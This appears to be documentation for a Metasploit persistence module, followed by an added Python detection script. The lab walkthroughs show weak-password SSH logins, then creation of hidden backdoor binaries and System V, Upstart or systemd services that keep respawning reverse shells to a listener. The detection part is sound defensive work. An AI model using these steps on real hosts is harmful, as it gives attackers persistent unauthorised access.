### Creating A Testing Environment

This module has been tested against:

1. Kali 2.0 (System V)
2. Ubuntu 14.04 (Upstart)
3. Ubuntu 16.04 (systemd)
4. Ubuntu 16.04 (systemd user)
5. CentOS 5 (System V)
6. Fedora 18 (systemd)
7. Fedora 20 (systemd)

## Verification Steps

1. Start msfconsole
2. Exploit a box via whatever method
3. Do: `use exploit/linux/local/service_persistence`
4. Do: `set session #`
5. Do: `set verbose true`
6. Do: `set payload cmd/unix/reverse_python` or `set payload cmd/unix/reverse_netcat`, depending on the system.
7. Optional: `set BACKDOOR_PATH /bin` if needed for compatibility on the remote system.
8. Do: `set lhost`
9. Do: `exploit`
10. Do: `use exploit/multi/handler`
11. Do: `set payload cmd/unix/reverse_python` or `set payload cmd/unix/reverse_netcat`, depending on the system.
12. Do: `set lhost`
13. Do: `exploit -j`
14. Kill your shell (if System V, reboot the target). For Upstart/systemd, wait 10 seconds.
15. Get shell

## Options

**target**

There are several selectable targets, each with its own caveats:

0. Automatic: detect the service manager automatically by running `which` to find the admin binaries.
1. System V: there is no automated restart, so while you'll get a shell, if it crashes you'll need to wait for an init transition (such as a reboot) to restart the process. This logs to syslog or to /var/log/.log and .err.
2. Upstart: logs to its own file. This module is set to restart the shell after a 10 second pause, and to do this forever.
3. systemd and systemd user: this module is set to restart the shell after a 10 second pause, and to do this forever.

**BACKDOOR_PATH**

If you need to change the location where the backdoor is written (as on CentOS 5), it can be done here. Default is /usr/local/bin.

**SERVICE**

The name of the service to create. If not chosen, a random 7 character name is created.

**SHELL_NAME**

The name of the file to write with our shell. If not chosen, a random 5 character name is created.
## Scenarios

### System V (CentOS 5 - root - chkconfig)

Get initial access:

```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.199.131
rhosts => 192.168.199.131
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password centos
password => centos
msf auxiliary(ssh_login) > exploit

[*] 192.168.199.131:22 SSH - Starting bruteforce
[+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Install our callback service (System V with chkconfig). Note that we change BACKDOOR_PATH, since /usr/local/bin isn't in the PATH for CentOS 5 services.

```
msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set BACKDOOR_PATH /bin
BACKDOOR_PATH => /bin
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(service_persistence) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(service_persistence) > exploit

[*] Started reverse handler on 192.168.199.128:4444
[*] Writing backdoor to /bin/GUIJc
[*] Max line length is 65537
[*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf
[*] Utilizing System_V
[*] Utilizing chkconfig
[*] Writing service: /etc/init.d/HqdezBF
[*] Max line length is 65537
[*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf
[*] Enabling & starting our service
[*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400
```

Reboot the box to prove persistence:

```
reboot
^Z
Background session 2? [y/N]  y
msf exploit(service_persistence) > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(handler) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.199.128:4444
[*] Starting the payload handler...
[*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400
```

### Upstart (Ubuntu 14.04.4 Server - root)

Of note, I allowed root login via SSH with password only to gain easy initial access.

Get initial access:

```
msf auxiliary(ssh_login) > exploit

[*] 10.10.60.175:22 SSH - Starting bruteforce
[+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux '
[*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Install our callback service (Upstart):

```
msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(service_persistence) > set lhost 10.10.60.168
lhost => 10.10.60.168
msf exploit(service_persistence) > exploit

[*] Started reverse handler on 10.10.60.168:4444
[*] Writing backdoor to /usr/local/bin/bmmjv
[*] Max line length is 65537
[*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf
[*] Utilizing Upstart
[*] Writing /etc/init/Hipnufl.conf
[*] Max line length is 65537
[*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf
[*] Starting service
[*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log
[*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400
```

And now we can kill the callback shell from our previous session:

```
^Z
Background session 5? [y/N]  y
msf exploit(service_persistence) > sessions -i 1
[*] Starting interaction with 1...

netstat -antp | grep 4444
tcp        0      0 10.10.60.175:44368      10.10.60.168:4444       ESTABLISHED 1783/bash
tcp        0      0 10.10.60.175:44370      10.10.60.168:4444       ESTABLISHED 1789/python
kill 1783
[*] 10.10.60.175 - Command shell session 5 closed.  Reason: Died from EOFError
kill 1789
```

Now with a multi handler, we can catch Upstart restarting the process every 10 seconds:

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(handler) > set lhost 10.10.60.168
lhost => 10.10.60.168
msf exploit(handler) > exploit

[*] Started reverse handler on 10.10.60.168:4444
[*] Starting the payload handler...
[*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400
```

### systemd (Ubuntu 16.04 Server - root)

Ubuntu 16.04 doesn't ship many of the default shell options; however, `cmd/unix/reverse_netcat` works. While the Python payload works on previous systems, on 16.04 the interpreter is `python3`, so a payload that calls `python` will fail.

Get initial access, then install our callback service (systemd):

```
msf exploit(handler) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(service_persistence) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(service_persistence) > exploit

[*] Started reverse handler on 192.168.199.128:4444
[*] Writing backdoor to /usr/local/bin/JSRCF
[*] Max line length is 65537
[*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf
[*] Utilizing systemd
[*] /lib/systemd/system/YelHpCx.service
[*] Max line length is 65537
[*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf
[*] Enabling service
[*] Starting service
[*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400
^Z
Background session 7? [y/N]  y
```

Kill the process on the Ubuntu target box via local access (#good_admin):

```
root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444
tcp        0      0 192.168.199.130:47052   192.168.199.128:4444    ESTABLISHED 5632/nc
root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632
```

And logically, we lose our shell:

```
[*] 192.168.199.130 - Command shell session 7 closed.  Reason: Died from EOFError
```

Now with a multi handler, we can catch systemd restarting the process every 10 seconds:

```
msf exploit(service_persistence) > use exploit/multi/handler
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.199.128  yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.199.128:4444
[*] Starting the payload handler...
[*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
```

### systemd user (Ubuntu 16.04 Server - vagrant)

```
msf5 exploit(linux/local/service_persistence) > options

Module options (exploit/linux/local/service_persistence):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   BACKDOOR_PATH  /tmp             yes       Writable path to put our shell
   SERVICE                         no        Name of service to create
   SESSION                         yes       The session to run this module on
   SHELL_NAME                      no        Name of shell file to write


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   systemd user


msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Writing backdoor to /tmp/PPpCF
[*] Max line length is 65537
[*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
[*] Creating user service directory
[*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
[*] Max line length is 65537
[*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: OzzdRBC
[*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600

id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
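As a defensive counterpart to the targets described under Options and to the file locations that appear in the scenarios (/lib/systemd/system, /etc/init, /etc/init.d, ~/.config/systemd/user, and the /usr/local/bin and /tmp backdoor paths), here is an added detection example. It is not part of the Metasploit module or its documentation; the watch-list of directories, the scan locations, the heuristics and the embedded sample unit texts are my own constructed assumptions. It parses systemd units (system and per-user scope), Upstart jobs and System V init scripts, and reports any unit whose ExecStart or exec line starts something from a user-writable or unusual directory, noting when the unit is also configured to respawn on exit, which is exactly the behaviour the Upstart and systemd targets rely on.

```python
#!/usr/bin/env python3
"""Hunt for service-manager persistence on a Linux host (added example).

Scans the locations a service-based backdoor is typically written into and
reports units that start a binary from a user-writable or unusual directory,
especially when the unit also respawns on exit.
"""
import configparser
import re
from pathlib import Path

# Assumed watch-list: directories where a dropped service binary tends to live.
# Tune this to your own baseline; /usr/local/bin will also catch locally
# installed software and should be reviewed rather than auto-alerted on.
SUSPICIOUS_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/home", "/usr/local/bin")

# Assumed scan locations (relative to /), matching the paths seen above.
SYSTEMD_GLOBS = ("lib/systemd/system/*.service",
                 "etc/systemd/system/*.service",
                 "home/*/.config/systemd/user/*.service",
                 "root/.config/systemd/user/*.service")
UPSTART_GLOB = "etc/init/*.conf"
INITD_GLOB = "etc/init.d/*"

# An absolute path not glued to a preceding word character, dot or slash
# (so "@/usr/bin/x" and "-/usr/bin/x" from systemd ExecStart still match).
PATH_RE = re.compile(r"(?<![\w./])/(?:[\w.-]+/)*[\w.-]+")


def suspicious_paths(text):
    """Return sorted absolute paths in text that lie under SUSPICIOUS_DIRS."""
    hits = set()
    for p in PATH_RE.findall(text):
        if any(p == d or p.startswith(d + "/") for d in SUSPICIOUS_DIRS):
            hits.add(p)
    return sorted(hits)


def scan_systemd_unit(name, text):
    """Findings for one systemd unit (system or user scope) given its text."""
    parser = configparser.ConfigParser(interpolation=None, strict=False,
                                       delimiters=("=",))
    try:
        parser.read_string(text)
    except configparser.Error as exc:
        return [f"{name}: could not parse unit ({exc})"]
    if not parser.has_section("Service"):
        return []
    svc = parser["Service"]
    bad = suspicious_paths(svc.get("ExecStart", ""))
    if not bad:
        return []
    findings = [f"{name}: ExecStart references {', '.join(bad)}"]
    restart = svc.get("Restart", "no").lower()
    if restart != "no":  # always / on-failure / on-abort ... keep it alive
        findings.append(f"{name}: respawns on exit (Restart={restart}, "
                        f"RestartSec={svc.get('RestartSec', 'default')})")
    return findings


def scan_upstart_job(name, text):
    """Findings for one Upstart job (.conf) given its text."""
    bad = suspicious_paths(text)
    if not bad:
        return []
    findings = [f"{name}: job references {', '.join(bad)}"]
    if re.search(r"^\s*respawn\b", text, re.M):
        findings.append(f"{name}: respawn stanza present, job restarts when it exits")
    return findings


def scan_initd_script(name, text):
    """Findings for one System V init script given its text."""
    bad = suspicious_paths(text)
    return [f"{name}: script references {', '.join(bad)}"] if bad else []


def _read(path):
    """Read a file, treating unreadable files (permissions) as empty."""
    try:
        return path.read_text(errors="replace")
    except OSError:
        return ""


def scan_host():
    """Walk the real service directories and collect all findings."""
    root, findings = Path("/"), []
    for pattern in SYSTEMD_GLOBS:
        findings += [f for p in root.glob(pattern) if p.is_file()
                     for f in scan_systemd_unit(str(p), _read(p))]
    findings += [f for p in root.glob(UPSTART_GLOB) if p.is_file()
                 for f in scan_upstart_job(str(p), _read(p))]
    findings += [f for p in root.glob(INITD_GLOB) if p.is_file()
                 for f in scan_initd_script(str(p), _read(p))]
    return findings


# Constructed samples (not the module's real unit text) used for the checks.
BENIGN_UNIT = """[Unit]
Description=OpenBSD Secure Shell server

[Service]
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
Restart=on-failure
"""
SUSPICIOUS_UNIT = """[Service]
ExecStart=/usr/local/bin/JSRCF
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target
"""
BENIGN_JOB = 'description "sshd"\nrespawn\nexec /usr/sbin/sshd -D\n'
SUSPICIOUS_JOB = "respawn\nexec /usr/local/bin/bmmjv\n"

if __name__ == "__main__":
    for line in scan_host():
        print(line)
```

Run it as root so the per-user `~/.config/systemd/user` directories are readable; a unit that both points into the watch-list and sets `Restart=`/`respawn` is the pattern worth escalating, since a legitimate service rarely needs to be relaunched from /tmp every few seconds.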